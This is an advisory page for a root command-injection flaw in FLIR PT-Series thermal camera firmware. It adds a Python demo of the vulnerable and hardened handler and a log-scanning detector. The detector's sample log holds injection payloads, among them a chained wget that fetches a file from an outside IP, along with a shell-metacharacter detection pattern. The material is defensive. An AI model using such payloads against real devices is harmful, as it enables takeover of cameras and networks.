CVE-2017-20216 in Thermal Camera PT-Series
Summary
by MITRE • 01/08/2026
FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. Attackers can execute arbitrary system commands as root by exploiting unsanitized POST parameters in the execFlirSystem() function through shell_exec() calls. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-06 (UTC).
Analysis
by VulDB Data Team • 01/08/2026
FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains a critical remote command injection vulnerability in the controllerFlirSystem.php script. The flaw stems from missing input validation in the execFlirSystem() function, which passes POST parameters straight into shell_exec() calls without filtering them. Because the script accepts requests without authentication and the web application runs as root, an unauthenticated remote attacker can execute arbitrary system commands with root privileges, fully compromising the device and gaining a foothold on the network it is attached to. Exploitation in the wild was observed by the Shadowserver Foundation on 2026-01-06 (UTC), so this is not a theoretical weakness: exposed devices are already being attacked.
Technically this is a textbook command injection: attacker-controlled POST parameters are concatenated into a command string that shell_exec() hands to the system shell. Shell metacharacters in a parameter value (a semicolon, a pipe, backticks or $( )) therefore terminate the intended command and start a new one of the attacker's choosing, and because the handler performs no authentication check there is nothing to bypass first. controllerFlirSystem.php handles system-level operations, so the injected commands run with the highest privilege available to the application, which on this firmware is root; that makes the script an obvious target for anyone seeking persistent access to networked thermal imaging equipment.
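The pattern described above, as an added example that is not FLIR's code and not part of the VulDB page: the real handler is PHP and calls shell_exec(), so the Python below reproduces it with subprocess.run(shell=True), which is the direct equivalent. The parameter names "action" and "value", the allowlist and the use of echo as the system utility are all hypothetical; echo keeps the injected command harmless while still showing that it runs.

```python
"""Added example (not FLIR's code): unauthenticated command injection through
POST parameters, in the vulnerable form beside a hardened form.
The page's script is PHP; shell_exec() there == subprocess.run(shell=True) here.
Parameter names, the allowlist and the 'echo' utility are hypothetical."""
import re
import subprocess

def exec_flir_system_vulnerable(post: dict) -> str:
    # Untrusted POST values are concatenated straight into a shell command line,
    # exactly the pattern the advisory describes. A value such as
    # "cam1; echo INJECTED" ends the intended command and starts a new one.
    cmd = "echo configuring " + post.get("action", "") + " " + post.get("value", "")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Hardened form: allowlist the action, constrain the value, and never go
# through a shell. Both layers are needed; quoting alone (PHP's
# escapeshellarg()) still lets an attacker pick arbitrary arguments.
ALLOWED_ACTIONS = {"reboot", "set-hostname"}        # hypothetical actions
VALUE_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")      # hostname-like values only

def exec_flir_system_hardened(post: dict) -> str:
    action = post.get("action", "")
    value = post.get("value", "")
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    if not VALUE_RE.fullmatch(value):
        raise ValueError(f"invalid value {value!r}")
    # argv list, no shell: whatever the value contains, it reaches the
    # program as one argument and is never parsed for metacharacters.
    out = subprocess.run(["echo", "configuring", action, value],
                         capture_output=True, text=True)
    return out.stdout

if __name__ == "__main__":
    payload = {"action": "reboot", "value": "cam1; echo INJECTED"}
    print(exec_flir_system_vulnerable(payload))   # second command runs
    try:
        exec_flir_system_hardened(payload)
    except ValueError as e:
        print("rejected:", e)                       # injection never reaches a shell
```

Run it and the vulnerable handler prints INJECTED on its own line because the shell executed the second command; the hardened handler rejects the same request before anything is executed. In the real firmware the fix belongs in execFlirSystem(): an allowlist of permitted operations, strict validation of every parameter, and an exec-style call that does not involve the shell.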
From an operational perspective, this vulnerability poses significant risks to organizations relying on FLIR thermal cameras for security monitoring, industrial inspection, or environmental monitoring. Root command execution lets an attacker modify system configuration, install persistent backdoors, read data stored on the device, tamper with or disable the camera's video feed, and use the camera as a pivot for lateral movement into the rest of the network. Because no credentials are required, any attacker who can reach the device's web interface gains full control immediately, which makes internet-exposed or poorly segmented cameras especially dangerous. A further difficulty is that an exploit request looks like an ordinary HTTP POST to the management interface, so distinguishing malicious from legitimate traffic requires inspecting request bodies, not just connection logs, and doing so across fleets of devices spread over many sites.
Organizations should apply firmware updates from FLIR as soon as they become available. Until then, thermal cameras should be segmented from critical network infrastructure and their web interface should be reachable only from a dedicated management network, never from the internet. Network monitoring and intrusion detection should be tuned to flag requests to controllerFlirSystem.php that carry shell metacharacters in POST parameters or that originate outside the management network, and to alert on unusual outbound connections from the cameras, which are the typical sign of a dropped payload being fetched. The flaw maps to CWE-77 (Improper Neutralization of Special Elements used in a Command) and CWE-88 (Argument Injection). Running the web application as root additionally violates the principle of least privilege: a successful injection yields root rather than a constrained service account. Post-exploitation activity on a compromised camera corresponds to MITRE ATT&CK technique T1059 (Command and Scripting Interpreter). Regular security assessments and vulnerability scanning should be conducted to identify similar flaws in other embedded systems and ensure comprehensive network security coverage.
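The detection logic recommended above, as an added example that is not part of the VulDB page: it scans request records of the kind a reverse proxy or WAF placed in front of the camera could emit (web server access logs alone do not contain POST bodies, so the body has to be captured somewhere). The record format, the management subnet, the script path under the web root and every sample line are constructed for the example.

```python
"""Added example (not from the VulDB page): flag command-injection attempts
against controllerFlirSystem.php in constructed proxy/WAF request records.
Record format: "<ts> <src_ip> <method> <path> <urlencoded-body-or-dash>".
The management subnet, the script path and all sample lines are assumptions."""
import ipaddress
import re
from urllib.parse import parse_qs

# Shell metacharacters that have no business in a camera's form fields.
SHELL_META_RE = re.compile(r"(;|\|\||&&|\||`|\$\(|\$\{|\n|\r|>|<)")
TARGET_SCRIPT = "controllerFlirSystem.php"
# Hypothetical management subnet; any other source touching the script is suspect.
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")

# Constructed sample records (parameters are URL-encoded as a browser would send them).
SAMPLE_LOG = """\
2026-01-06T08:00:01Z 10.10.0.5 POST /controllerFlirSystem.php action=reboot&value=cam1
2026-01-06T08:00:07Z 198.51.100.23 POST /controllerFlirSystem.php action=reboot&value=cam1%3Bwget+http%3A%2F%2F198.51.100.23%2Fx+-O+%2Ftmp%2Fx
2026-01-06T08:00:09Z 10.10.0.5 GET /live.php -
2026-01-06T08:00:12Z 203.0.113.9 POST /controllerFlirSystem.php action=%60id%60&value=x
2026-01-06T08:00:15Z 10.10.0.7 POST /controllerFlirSystem.php action=set-hostname&value=cam-lobby
"""

def parse_record(line: str) -> dict:
    ts, src, method, path, body = line.split(" ", 4)
    return {"ts": ts, "src": src, "method": method, "path": path, "body": body}

def analyse(line: str) -> list:
    """Return the list of findings for one record (empty when it looks benign)."""
    rec = parse_record(line)
    findings = []
    if not rec["path"].endswith(TARGET_SCRIPT):
        return findings
    if ipaddress.ip_address(rec["src"]) not in MGMT_NET:
        findings.append("request to system-control script from outside management subnet")
    if rec["method"] == "POST" and rec["body"] != "-":
        # parse_qs URL-decodes, so %3B becomes ';' and %60 becomes '`' before matching.
        for name, values in parse_qs(rec["body"], keep_blank_values=True).items():
            for v in values:
                if SHELL_META_RE.search(v):
                    findings.append(f"shell metacharacter in parameter {name!r}: {v!r}")
    return findings

def scan(log_text: str) -> list:
    """Return (timestamp, source, findings) for every record that raised a finding."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        findings = analyse(line)
        if findings:
            rec = parse_record(line)
            alerts.append((rec["ts"], rec["src"], findings))
    return alerts

if __name__ == "__main__":
    for ts, src, findings in scan(SAMPLE_LOG):
        print(ts, src)
        for f in findings:
            print("   ", f)
```

Two of the five sample records are flagged: the wget download chained with a semicolon and the backtick-wrapped id, both from addresses outside the management subnet. The legitimate reboot and hostname changes from the management network pass, and the GET for the live view is ignored because it never touches the control script. Decoding before matching matters; a rule that looks for a literal semicolon in the raw body misses the %3B form that every browser and most exploit tools send.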